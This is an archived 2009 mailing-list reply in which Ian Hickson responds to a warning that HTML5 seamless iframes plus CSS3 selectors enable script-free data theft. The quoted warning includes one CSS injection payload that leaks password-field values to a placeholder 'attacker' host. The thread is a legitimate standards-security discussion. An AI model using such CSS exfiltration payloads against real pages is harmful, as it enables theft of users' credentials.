Re: Seamless iframes + CSS3 selectors = bad idea

On Fri, 4 Dec 2009, Eduardo Vela wrote:
>
> I sincerely understand why people want seamless iframes on HTML5.. I 
> mean, I've been there.. but sometimes the better way to do something is 
> not to do it.
> 
> The perfect example are seamless iframes (defined in html5) and CSS3 
> selectors.
> 
> What I see with those awesome CSS3 selectors such as:
> 
> input[type=password][value^=a]{background:url("//attacker/password_starts_with=a")}
> 
> create a new type of XSS attacks, and those are purely CSS based XSS 
> attacks.. without JS.. that will allow an attacker to read arbitrary 
> files from the page WITHOUT the need of JS.

How is the attacker inserting CSS into the page, in this scenario?

I agree that if an attacker can insert CSS into a victim page, that 
numerous information retrieval attacks are possible (though not currently 
a password attack, as Maciej mentioned). However, this has long been 
known, it doesn't seem to be a new problem.

-- 
Ian Hickson               U+1047E                )\._.,--....,'``.    fL
http://ln.hixie.ch/       U+263A                /,   _.. \   _\  ;`._ ,.
Things that are impossible just take longer.   `._.-(,_..'--(,_..'`-.;.'

Received on Sunday, 6 December 2009 06:17:31 UTC